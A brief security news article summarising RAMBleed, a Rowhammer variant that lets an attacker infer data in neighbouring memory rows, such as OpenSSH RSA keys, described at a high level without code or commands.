RAMBleed, new variant of Rowhammer attack to steal RAM memory information

A team of experts in network security from Australia and the United States has published an investigation that reveals a new variant of the Rowhammer attack. First detected in 2014, Rowhammer consists of attacking RAM cells with constant reading and writing operations that modify the electrical load of memory cells, altering data bits (0 to 1 and reverse), altering the information stored in the memory.

Unlike the first version of Rowhammer, this new attack variant, known as RAMBleed, can be used to steal information from the targeted device. Over time, experts have discovered new methods for conducting Rowhammer attacks, but on this occasion, network security experts discovered a number of steps to actively extract data from an RAM card.

For this, the researchers had to devise and combine different techniques that, together, would allow the attack; among the necessary steps are: 

  • Investigators found a way to abuse the buddy memory allocation algorithm to allocate a massive memory block of consecutive physical addresses to deploy the attack
  • Later the researchers designed a new mechanism, called “Frame Feng Shui”, to place the victim’s program pages in a desired place in the physical memory
  • Subsequently, researchers developed a new method to organize data into memory and attack rows to deduce which data is stored in the closest memory cells instead of just changing the value of each bit

According to experts in network security, the RAMBleed attack occurs when the attacker acts on the rows of memory A0 and A2 and accesses the modifications in row A1, near the “secret blocks” of the selected area for the test.

By carefully arranging the data within the RAM in a format selected by the attacker, it can read the bit changes in areas close to where the “secret data” are stored. According to experts from the International Institute of Cyber Security (IICS) by combining these new techniques, it is possible to extract information such as RSA keys from an OpenSSH server on a Linux operating system.

Additional information on the RAMBleed attack, tracked as CVE-2019-0174, is available in the research published by experts.